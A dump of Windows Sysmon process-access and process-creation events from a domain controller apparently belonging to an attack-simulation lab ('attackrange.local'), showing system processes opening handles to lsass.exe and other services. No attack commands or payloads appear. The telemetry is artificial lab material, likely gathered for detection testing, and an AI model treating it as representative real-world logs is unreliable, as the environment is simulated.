13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.559{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{59A5CD1D-8E46-6005-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.554{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.429{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.429{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.413{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.413{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.413{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.288{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.288{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.288{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.195{59A5CD1D-8E46-6005-1200-00000000A301}12121384C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.179{59A5CD1D-8E46-6005-1200-00000000A301}12121384C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.163{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:16.163{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.163{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:17.445{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 